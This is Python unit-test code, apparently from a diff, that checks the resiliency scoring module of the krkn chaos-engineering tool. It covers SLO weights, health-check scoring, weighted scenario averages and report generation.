with self.assertRaises(ValueError):
Resiliency._normalise_alerts({"key": "value"})
def test_normalise_alerts_stores_weight_none_when_absent(self):
"""Test that alerts without a weight field store None, not 0, preserving severity fallback."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical", "description": "no weight"},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertIsNone(normalized[0]["weight"])
def test_normalise_alerts_stores_custom_weight_when_present(self):
"""Test that a numeric weight field is preserved exactly."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical", "description": "slo1", "weight": 10},
{"expr": "cpu > 80", "severity": "warning", "description": "slo2", "weight": 0.5},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(normalized[0]["weight"], 10)
self.assertEqual(normalized[1]["weight"], 0.5)
class TestResiliencyCalculateScore(unittest.TestCase):
"""Test cases for calculate_score method."""
def setUp(self):
"""Set up test fixtures."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "slo1"},
{"expr": "cpu > 80", "severity": "warning", "description": "slo2"},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
def test_calculate_score_with_all_passing(self):
"""Test calculate_score with all SLOs passing."""
self.res._results = {"slo1": True, "slo2": True}
score = self.res.calculate_score()
self.assertEqual(score, 100)
self.assertEqual(self.res._score, 100)
def test_calculate_score_with_failures(self):
"""Test calculate_score with some failures."""
self.res._results = {"slo1": False, "slo2": True}
score = self.res.calculate_score()
# slo1 is critical (3 pts lost), slo2 is warning (1 pt)
# Total: 4 pts, Lost: 3 pts -> 25%
self.assertEqual(score, 25)
def test_calculate_score_with_health_checks(self):
"""Test calculate_score includes health check results."""
self.res._results = {"slo1": True, "slo2": True}
health_checks = {"http://service": False} # Critical, 3 pts lost
score = self.res.calculate_score(health_check_results=health_checks)
# Total: 3 + 1 + 3 = 7 pts, Lost: 3 pts -> ~57%
self.assertEqual(score, 57)
self.assertEqual(self.res._health_check_results, health_checks)
def test_calculate_score_uses_per_slo_custom_weight_from_yaml(self):
"""Integration: per-SLO custom weight loaded from YAML is used in scoring."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "high", "weight": 10},
{"expr": "cpu > 80", "severity": "warning", "description": "low", "weight": 0.5},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
temp = f.name
try:
res = Resiliency(alerts_yaml_path=temp)
# "high" passes (10 pts), "low" fails (loses 0.5 pts)
res._results = {"high": True, "low": False}
score = res.calculate_score()
# Total: 10.5, Lost: 0.5 -> 95%
self.assertEqual(score, 95)
self.assertEqual(res._breakdown["total_points"], 10.5)
self.assertEqual(res._breakdown["points_lost"], 0.5)
finally:
os.unlink(temp)
def test_calculate_score_stores_breakdown(self):
"""Test that calculate_score stores the breakdown dict."""
self.res._results = {"slo1": True, "slo2": False}
self.res.calculate_score()
self.assertIsNotNone(self.res._breakdown)
self.assertIn("passed", self.res._breakdown)
self.assertIn("failed", self.res._breakdown)
self.assertIn("total_points", self.res._breakdown)
self.assertIn("points_lost", self.res._breakdown)
class TestResiliencyToDict(unittest.TestCase):
"""Test cases for to_dict method."""
def setUp(self):
"""Set up test fixtures."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([{"expr": "test", "severity": "critical"}], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
def test_to_dict_before_calculate_raises_error(self):
"""Test that to_dict raises error if calculate_score not called."""
with self.assertRaises(RuntimeError):
self.res.to_dict()
def test_to_dict_returns_complete_data(self):
"""Test that to_dict returns all expected fields."""
self.res._results = {"slo_0": True}
health_checks = {"health1": True}
self.res.calculate_score(health_check_results=health_checks)
result = self.res.to_dict()
self.assertIn("score", result)
self.assertIn("breakdown", result)
self.assertIn("slo_results", result)
self.assertIn("health_check_results", result)
self.assertEqual(result["slo_results"], {"slo_0": True})
self.assertEqual(result["health_check_results"], health_checks)
class TestResiliencyScenarioReports(unittest.TestCase):
"""Test cases for scenario-based resiliency evaluation."""
def setUp(self):
"""Set up test fixtures."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([
{"expr": "up == 0", "severity": "critical", "description": "slo1"}
], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
self.mock_prom = Mock()
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_report(self, mock_calc_score, mock_eval_slos):
"""Test adding a scenario report."""
mock_eval_slos.return_value = {"slo1": True}
mock_calc_score.return_value = (100, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
score = self.res.add_scenario_report(
scenario_name="test_scenario",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
weight=1.5,
)
self.assertEqual(score, 100)
self.assertEqual(len(self.res.scenario_reports), 1)
self.assertEqual(self.res.scenario_reports[0]["name"], "test_scenario")
self.assertEqual(self.res.scenario_reports[0]["weight"], 1.5)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_report_calculates_weighted_average(self, mock_eval_slos):
"""Test that finalize_report calculates weighted average correctly."""
mock_eval_slos.return_value = {"slo1": True}
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 2, 0, 0)
# Add two scenarios with different scores and weights
with patch('krkn.resiliency.resiliency.calculate_resiliency_score') as mock_calc:
mock_calc.return_value = (80, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
self.res.add_scenario_report(
scenario_name="scenario1",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
weight=2,
)
mock_calc.return_value = (60, {"passed": 0, "failed": 1, "total_points": 3, "points_lost": 3})
self.res.add_scenario_report(
scenario_name="scenario2",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
weight=1,
)
with patch('krkn.resiliency.resiliency.calculate_resiliency_score') as mock_calc:
mock_calc.return_value = (100, {"passed": 1, "failed": 0})
self.res.finalize_report(
prom_cli=self.mock_prom,
total_start_time=start,
total_end_time=end,
)
        # Weighted average: (80*2 + 60*1) / (2+1) = 220/3 = 73.33... -> 73
self.assertEqual(self.res.summary["resiliency_score"], 73)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_report_populates_summary_and_detailed(self, mock_eval_slos):
"""Test that finalize_report sets summary and detailed_report."""
mock_eval_slos.return_value = {"slo1": True}
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
with patch('krkn.resiliency.resiliency.calculate_resiliency_score') as mock_calc:
mock_calc.return_value = (95, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
self.res.add_scenario_report(
scenario_name="s1",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
)
self.res.finalize_report(
prom_cli=self.mock_prom,
total_start_time=start,
total_end_time=end,
)
self.assertIsNotNone(self.res.summary)
self.assertIn("resiliency_score", self.res.summary)
self.assertIn("scenarios", self.res.summary)
self.assertIsNotNone(self.res.detailed_report)
self.assertIn("scenarios", self.res.detailed_report)
def test_finalize_report_without_scenarios_raises_error(self):
"""Test that finalize_report raises error if no scenarios added."""
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
with self.assertRaises(RuntimeError):
self.res.finalize_report(
prom_cli=self.mock_prom,
total_start_time=start,
total_end_time=end,
)
def test_get_summary_before_finalize_raises_error(self):
"""Test that get_summary raises RuntimeError before finalize_report is called."""
with self.assertRaises(RuntimeError):
self.res.get_summary()
def test_get_detailed_report_before_finalize_raises_error(self):
"""Test that get_detailed_report raises RuntimeError before finalize_report is called."""
with self.assertRaises(RuntimeError):
self.res.get_detailed_report()
class TestResiliencyCompactBreakdown(unittest.TestCase):
"""Test cases for compact_breakdown static method."""
def test_compact_breakdown_with_valid_report(self):
"""Test compact_breakdown with valid report structure."""
report = {
"score": 85,
"breakdown": {
"passed": 8,
"failed": 2,
}
}
result = Resiliency.compact_breakdown(report)
self.assertEqual(result["resiliency_score"], 85)
self.assertEqual(result["passed_slos"], 8)
self.assertEqual(result["total_slos"], 10)
def test_compact_breakdown_with_missing_fields_uses_defaults(self):
"""Test compact_breakdown handles missing fields gracefully."""
report = {}
result = Resiliency.compact_breakdown(report)
self.assertEqual(result["resiliency_score"], 0)
self.assertEqual(result["passed_slos"], 0)
self.assertEqual(result["total_slos"], 0)
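The two tests above pin down `compact_breakdown`'s observable contract. A hedged reconstruction, built only from those assertions (the real implementation may differ in detail):

```python
# Sketch of compact_breakdown's apparent contract: read score/passed/failed
# with defaults of 0, and derive total_slos as passed + failed.
def compact_breakdown(report):
    breakdown = report.get("breakdown", {})
    passed = breakdown.get("passed", 0)
    failed = breakdown.get("failed", 0)
    return {
        "resiliency_score": report.get("score", 0),
        "passed_slos": passed,
        "total_slos": passed + failed,
    }

# Mirrors the valid-report and missing-fields cases asserted above.
assert compact_breakdown({"score": 85, "breakdown": {"passed": 8, "failed": 2}}) == {
    "resiliency_score": 85, "passed_slos": 8, "total_slos": 10,
}
assert compact_breakdown({}) == {"resiliency_score": 0, "passed_slos": 0, "total_slos": 0}
```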
class TestResiliencyAddScenarioReports(unittest.TestCase):
"""Test cases for the add_scenario_reports method."""
def setUp(self):
"""Set up test fixtures."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([
{"expr": "up == 0", "severity": "critical", "description": "slo1"}
], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
self.mock_prom = Mock()
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_reports_enriches_dict_telemetry(self, mock_calc_score, mock_eval_slos):
"""Test that dict telemetry items are enriched with a resiliency_report."""
mock_eval_slos.return_value = {"slo1": True}
mock_calc_score.return_value = (85, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
telemetries = [
{
"scenario": "pod_scenario",
"start_timestamp": 1609459200,
"end_timestamp": 1609462800,
}
]
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
self.res.add_scenario_reports(
scenario_telemetries=telemetries,
prom_cli=self.mock_prom,
scenario_type="default_type",
batch_start_dt=start,
batch_end_dt=end,
weight=1.5,
)
self.assertEqual(len(self.res.scenario_reports), 1)
self.assertIn("resiliency_report", telemetries[0])
self.assertIn("resiliency_score", telemetries[0]["resiliency_report"])
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_reports_uses_batch_times_when_timestamps_missing(self, mock_calc_score, mock_eval_slos):
"""Test that batch times are used when telemetry has no timestamps."""
mock_eval_slos.return_value = {}
mock_calc_score.return_value = (0, {"passed": 0, "failed": 0, "total_points": 0, "points_lost": 0})
telemetries = [{"scenario": "my_scenario"}]
start = datetime.datetime(2025, 6, 1, 0, 0, 0)
end = datetime.datetime(2025, 6, 1, 1, 0, 0)
self.res.add_scenario_reports(
scenario_telemetries=telemetries,
prom_cli=self.mock_prom,
scenario_type="fallback_type",
batch_start_dt=start,
batch_end_dt=end,
)
# evaluate_slos should have been called with the batch times
call_kwargs = mock_eval_slos.call_args[1]
self.assertEqual(call_kwargs["start_time"], start)
self.assertEqual(call_kwargs["end_time"], end)
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_reports_uses_scenario_name_from_telemetry(self, mock_calc_score, mock_eval_slos):
"""Test that scenario name is taken from telemetry, not the fallback type."""
mock_eval_slos.return_value = {"slo1": True}
mock_calc_score.return_value = (100, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
telemetries = [{"scenario": "real_scenario_name"}]
self.res.add_scenario_reports(
scenario_telemetries=telemetries,
prom_cli=self.mock_prom,
scenario_type="fallback_type",
batch_start_dt=datetime.datetime(2025, 1, 1),
batch_end_dt=datetime.datetime(2025, 1, 2),
)
self.assertEqual(self.res.scenario_reports[0]["name"], "real_scenario_name")
class TestFinalizeAndSave(unittest.TestCase):
"""Test cases for finalize_and_save method."""
def setUp(self):
"""Set up test fixtures with a pre-populated scenario report."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([
{"expr": "up == 0", "severity": "critical", "description": "slo1"}
], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
self.mock_prom = Mock()
self.start = datetime.datetime(2025, 1, 1, 0, 0, 0)
self.end = datetime.datetime(2025, 1, 1, 2, 0, 0)
# Pre-populate a scenario report so finalize_report doesn't raise
self.res.scenario_reports = [
{
"name": "test_scenario",
"window": {"start": self.start.isoformat(), "end": self.end.isoformat()},
"score": 90,
"weight": 1,
"breakdown": {"total_points": 3, "points_lost": 0, "passed": 1, "failed": 0},
"slo_results": {"slo1": True},
"health_check_results": {},
}
]
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_and_save_standalone_writes_detailed_file(self, mock_eval_slos):
"""Test that standalone mode writes a detailed JSON report to the given path."""
mock_eval_slos.return_value = {"slo1": True}
with tempfile.TemporaryDirectory() as tmpdir:
detailed_path = os.path.join(tmpdir, "resiliency-report.json")
self.res.finalize_and_save(
prom_cli=self.mock_prom,
total_start_time=self.start,
total_end_time=self.end,
run_mode="standalone",
detailed_path=detailed_path,
)
self.assertTrue(os.path.exists(detailed_path))
with open(detailed_path) as fp:
report = json.load(fp)
self.assertIn("scenarios", report)
@patch('builtins.print')
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_and_save_controller_mode_prints_to_stdout(self, mock_eval_slos, mock_print):
"""Test that controller mode prints the detailed report to stdout with the expected prefix."""
mock_eval_slos.return_value = {"slo1": True}
self.res.finalize_and_save(
prom_cli=self.mock_prom,
total_start_time=self.start,
total_end_time=self.end,
run_mode="detailed",
)
mock_print.assert_called()
call_args = str(mock_print.call_args)
self.assertIn("KRKN_RESILIENCY_REPORT_JSON", call_args)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_and_save_populates_summary_after_call(self, mock_eval_slos):
"""Test that finalize_and_save populates summary so get_summary works afterward."""
mock_eval_slos.return_value = {"slo1": True}
self.res.finalize_and_save(
prom_cli=self.mock_prom,
total_start_time=self.start,
total_end_time=self.end,
)
summary = self.res.get_summary()
self.assertIsNotNone(summary)
self.assertIn("resiliency_score", summary)
if __name__ == '__main__':
unittest.main()
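The weighted-average aggregation asserted in `test_finalize_report_calculates_weighted_average` can be sketched in isolation; `weighted_average` is a hypothetical helper for illustration, not the project's API:

```python
# Hypothetical sketch of the aggregation the finalize_report test asserts:
# per-scenario scores are weighted, summed, and the quotient truncated to int.
def weighted_average(scores_and_weights):
    total_weight = sum(weight for _, weight in scores_and_weights)
    if total_weight == 0:
        return 0
    weighted_sum = sum(score * weight for score, weight in scores_and_weights)
    return int(weighted_sum / total_weight)

# Matches the test's expectation: (80*2 + 60*1) / (2+1) = 220/3 = 73.33 -> 73
assert weighted_average([(80, 2), (60, 1)]) == 73
```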


@@ -0,0 +1,409 @@
"""
Tests for krkn.resiliency.score module.
How to run these tests:
# Run all tests in this file
python -m unittest tests.test_resiliency_score
# Run all tests with verbose output
python -m unittest tests.test_resiliency_score -v
# Run a specific test class
python -m unittest tests.test_resiliency_score.TestSLOResult
python -m unittest tests.test_resiliency_score.TestCalculateResiliencyScore
# Run a specific test method
python -m unittest tests.test_resiliency_score.TestSLOResult.test_slo_result_initialization
python -m unittest tests.test_resiliency_score.TestCalculateResiliencyScore.test_all_slos_passing_returns_100
# Run with coverage
python -m coverage run -m unittest tests.test_resiliency_score
python -m coverage report -m
"""
import unittest
from krkn.resiliency.score import (
SLOResult,
calculate_resiliency_score,
DEFAULT_WEIGHTS,
)
class TestSLOResult(unittest.TestCase):
"""Test cases for the SLOResult class."""
def test_slo_result_initialization(self):
"""Test SLOResult object initialization."""
slo = SLOResult(name="test_slo", severity="critical", passed=True)
self.assertEqual(slo.name, "test_slo")
self.assertEqual(slo.severity, "critical")
self.assertTrue(slo.passed)
def test_slo_result_weight_critical_default(self):
"""Test weight calculation for critical SLO with default weights."""
slo = SLOResult(name="test_slo", severity="critical", passed=True)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["critical"])
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 3)
def test_slo_result_weight_warning_default(self):
"""Test weight calculation for warning SLO with default weights."""
slo = SLOResult(name="test_slo", severity="warning", passed=True)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["warning"])
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 1)
def test_slo_result_weight_custom_severity_weights(self):
"""Test weight calculation with custom severity-level weights."""
custom_weights = {"critical": 5, "warning": 2}
slo_critical = SLOResult(name="test1", severity="critical", passed=True)
slo_warning = SLOResult(name="test2", severity="warning", passed=True)
self.assertEqual(slo_critical.weight(custom_weights), 5)
self.assertEqual(slo_warning.weight(custom_weights), 2)
def test_slo_result_weight_unknown_severity_falls_back_to_warning(self):
"""Test that unknown severity falls back to warning weight."""
slo = SLOResult(name="test_slo", severity="unknown", passed=True)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["warning"])
def test_slo_result_custom_weight_overrides_severity(self):
"""Test that a per-SLO custom weight overrides the severity-based weight."""
slo = SLOResult(name="test_slo", severity="critical", passed=True, weight=10)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 10)
def test_slo_result_custom_weight_zero_is_valid(self):
"""Test that a per-SLO weight of 0 is respected."""
slo = SLOResult(name="test_slo", severity="critical", passed=False, weight=0)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 0)
def test_slo_result_explicit_none_weight_falls_back_to_severity(self):
"""Test that weight=None explicitly falls back to severity-based weight, not 0."""
slo = SLOResult(name="test_slo", severity="critical", passed=True, weight=None)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["critical"])
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 3)
def test_slo_result_float_custom_weight(self):
"""Test that a fractional custom weight (e.g. 0.5 as documented) is returned as-is."""
slo = SLOResult(name="test_slo", severity="warning", passed=True, weight=0.5)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 0.5)
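The `SLOResult.weight` tests above collectively pin down one resolution rule. A condensed, hedged model (`resolve_weight` is a hypothetical free function, not the class method):

```python
# Resolution rule implied by the tests: an explicit numeric weight (including
# 0 and fractions) wins; None or absent falls back to the severity table, and
# unknown severities map to the "warning" weight.
def resolve_weight(severity, custom_weight, severity_weights):
    if custom_weight is not None:
        return custom_weight
    return severity_weights.get(severity, severity_weights["warning"])

weights = {"critical": 3, "warning": 1}
assert resolve_weight("critical", 10, weights) == 10    # override
assert resolve_weight("critical", 0, weights) == 0      # zero is respected
assert resolve_weight("warning", 0.5, weights) == 0.5   # fractions pass through
assert resolve_weight("critical", None, weights) == 3   # severity fallback
assert resolve_weight("unknown", None, weights) == 1    # unknown -> warning
```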
class TestCalculateResiliencyScore(unittest.TestCase):
"""Test cases for the calculate_resiliency_score function."""
def test_all_slos_passing_returns_100(self):
"""Test that all passing SLOs returns score of 100."""
slo_definitions = {
"slo1": "critical",
"slo2": "warning",
}
prometheus_results = {
"slo1": True,
"slo2": True,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(score, 100)
self.assertEqual(breakdown["passed"], 2)
self.assertEqual(breakdown["failed"], 0)
self.assertEqual(breakdown["points_lost"], 0)
def test_all_slos_failing_returns_0(self):
"""Test that all failing SLOs returns score of 0."""
slo_definitions = {
"slo1": "critical",
"slo2": "warning",
}
prometheus_results = {
"slo1": False,
"slo2": False,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(score, 0)
self.assertEqual(breakdown["passed"], 0)
self.assertEqual(breakdown["failed"], 2)
def test_mixed_results_calculates_correct_score(self):
"""Test score calculation with mixed pass/fail results."""
slo_definitions = {
"slo_critical": "critical", # weight=3
"slo_warning": "warning", # weight=1
}
prometheus_results = {
"slo_critical": True, # 3 points
"slo_warning": False, # 0 points (lost 1)
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 4 points, Lost: 1 point
# Score: (4-1)/4 * 100 = 75%
self.assertEqual(score, 75)
self.assertEqual(breakdown["total_points"], 4)
self.assertEqual(breakdown["points_lost"], 1)
self.assertEqual(breakdown["passed"], 1)
self.assertEqual(breakdown["failed"], 1)
def test_slo_not_in_prometheus_results_is_excluded(self):
"""Test that SLOs not in prometheus_results are excluded from calculation."""
slo_definitions = {
"slo1": "critical",
"slo2": "warning",
"slo3": "critical", # Not in prometheus_results
}
prometheus_results = {
"slo1": True,
"slo2": True,
# slo3 is missing (no data)
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Only slo1 and slo2 should be counted
self.assertEqual(score, 100)
self.assertEqual(breakdown["passed"], 2)
self.assertEqual(breakdown["failed"], 0)
def test_health_checks_are_treated_as_critical(self):
"""Test that health checks are always weighted as critical."""
slo_definitions = {}
prometheus_results = {}
health_check_results = {
"http://service1": True,
"http://service2": False,
}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# 2 health checks, each critical (weight=3)
# Total: 6 points, Lost: 3 points (one failed)
# Score: (6-3)/6 * 100 = 50%
self.assertEqual(score, 50)
self.assertEqual(breakdown["total_points"], 6)
self.assertEqual(breakdown["points_lost"], 3)
def test_combined_slos_and_health_checks(self):
"""Test calculation with both SLOs and health checks."""
slo_definitions = {
"slo1": "warning", # weight=1
}
prometheus_results = {
"slo1": True,
}
health_check_results = {
"health1": True, # weight=3 (critical)
"health2": False, # weight=3 (critical)
}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 1 + 3 + 3 = 7 points
# Lost: 3 points (health2 failed)
        # Score: (7-3)/7 * 100 = 57.14... -> 57
self.assertEqual(score, 57)
self.assertEqual(breakdown["total_points"], 7)
self.assertEqual(breakdown["points_lost"], 3)
self.assertEqual(breakdown["passed"], 2)
self.assertEqual(breakdown["failed"], 1)
def test_per_slo_custom_weight_overrides_severity(self):
"""Test that per-SLO custom weight in extended format overrides default severity weight."""
slo_definitions = {
"slo1": {"severity": "critical", "weight": 10},
}
prometheus_results = {
"slo1": False,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(breakdown["total_points"], 10)
self.assertEqual(breakdown["points_lost"], 10)
self.assertEqual(score, 0)
def test_extended_format_mixed_with_legacy_format(self):
"""Test that extended dict format and legacy string format can be mixed."""
slo_definitions = {
"slo_custom": {"severity": "warning", "weight": 5}, # custom weight
"slo_legacy": "critical", # legacy, weight=3
}
prometheus_results = {
"slo_custom": False, # loses 5 pts
"slo_legacy": True, # keeps 3 pts
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 5 + 3 = 8, Lost: 5
# Score: (8-5)/8 * 100 = 37.5 -> 37
self.assertEqual(breakdown["total_points"], 8)
self.assertEqual(breakdown["points_lost"], 5)
self.assertEqual(score, 37)
def test_extended_format_weight_none_falls_back_to_severity(self):
"""Test that weight=None in extended dict format falls back to severity-based weight."""
slo_definitions = {
"slo1": {"severity": "critical", "weight": None}, # should use default critical weight=3
}
prometheus_results = {"slo1": False}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# weight falls back to critical=3
self.assertEqual(breakdown["total_points"], 3)
self.assertEqual(breakdown["points_lost"], 3)
self.assertEqual(score, 0)
def test_float_custom_weight_scoring(self):
"""Test scoring with fractional weights as documented (e.g. weight: 0.5)."""
slo_definitions = {
"slo_high": {"severity": "critical", "weight": 10},
"slo_low": {"severity": "warning", "weight": 0.5},
}
prometheus_results = {
"slo_high": True, # keeps 10 pts
"slo_low": False, # loses 0.5 pts
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 10.5, Lost: 0.5 -> (10/10.5)*100 = 95.23... -> 95
self.assertEqual(breakdown["total_points"], 10.5)
self.assertEqual(breakdown["points_lost"], 0.5)
self.assertEqual(score, 95)
def test_failed_slo_with_zero_weight_does_not_affect_score(self):
"""Test that a failing SLO with weight=0 contributes nothing to points_lost."""
slo_definitions = {
"slo_zero": {"severity": "critical", "weight": 0},
"slo_normal": "warning", # weight=1
}
prometheus_results = {
"slo_zero": False, # fails but contributes 0 pts
"slo_normal": True,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(breakdown["total_points"], 1)
self.assertEqual(breakdown["points_lost"], 0)
self.assertEqual(score, 100)
def test_all_custom_weight_slos_passing_returns_100(self):
"""Test that all custom-weight SLOs passing returns 100 regardless of weight values."""
slo_definitions = {
"slo1": {"severity": "critical", "weight": 20},
"slo2": {"severity": "warning", "weight": 5},
"slo3": {"severity": "critical", "weight": 0.5},
}
prometheus_results = {"slo1": True, "slo2": True, "slo3": True}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(score, 100)
self.assertEqual(breakdown["points_lost"], 0)
self.assertEqual(breakdown["passed"], 3)
self.assertEqual(breakdown["failed"], 0)
def test_empty_slo_definitions_returns_zero_score(self):
"""Test that empty SLO definitions returns score of 0."""
score, breakdown = calculate_resiliency_score(
slo_definitions={},
prometheus_results={},
health_check_results={}
)
self.assertEqual(score, 0)
self.assertEqual(breakdown["total_points"], 0)
self.assertEqual(breakdown["points_lost"], 0)
self.assertEqual(breakdown["passed"], 0)
self.assertEqual(breakdown["failed"], 0)
def test_prometheus_results_coerced_to_bool(self):
"""Test that prometheus results are properly coerced to boolean."""
slo_definitions = {
"slo1": "warning",
"slo2": "warning",
"slo3": "warning",
}
prometheus_results = {
"slo1": 1, # Truthy
"slo2": 0, # Falsy
"slo3": None, # Falsy
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# slo1 passes (1 point), slo2 and slo3 fail (0 points each)
# Total: 3 points, Lost: 2 points
        # Score: (3-2)/3 * 100 = 33.33... -> 33
self.assertEqual(score, 33)
self.assertEqual(breakdown["passed"], 1)
self.assertEqual(breakdown["failed"], 2)
def test_score_calculation_rounds_down(self):
"""Test that score calculation rounds down to integer."""
slo_definitions = {
"slo1": "critical", # 3 points
"slo2": "critical", # 3 points
"slo3": "critical", # 3 points
}
prometheus_results = {
"slo1": True, # 3 points
"slo2": True, # 3 points
"slo3": False, # 0 points (lost 3)
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 9 points, Lost: 3 points
# Score: (9-3)/9 * 100 = 66.666... -> 66
self.assertEqual(score, 66)
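The arithmetic asserted throughout this class reduces to one formula. A minimal sketch, assuming the score is the surviving fraction of total points truncated to an integer (with empty inputs scoring 0, per `test_empty_slo_definitions_returns_zero_score`); `expected_score` is an illustrative name, not part of `krkn.resiliency.score`:

```python
# Condensed model of the scoring arithmetic these tests exercise: sum the
# weights of evaluated checks, subtract points lost to failures, truncate.
def expected_score(total_points, points_lost):
    if total_points <= 0:
        return 0  # nothing evaluated -> score 0
    return int((total_points - points_lost) / total_points * 100)

assert expected_score(4, 1) == 75       # mixed results
assert expected_score(7, 3) == 57       # SLOs plus health checks, 57.14 truncated
assert expected_score(9, 3) == 66       # 66.66... rounds down
assert expected_score(10.5, 0.5) == 95  # fractional weights
```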
if __name__ == '__main__':
unittest.main()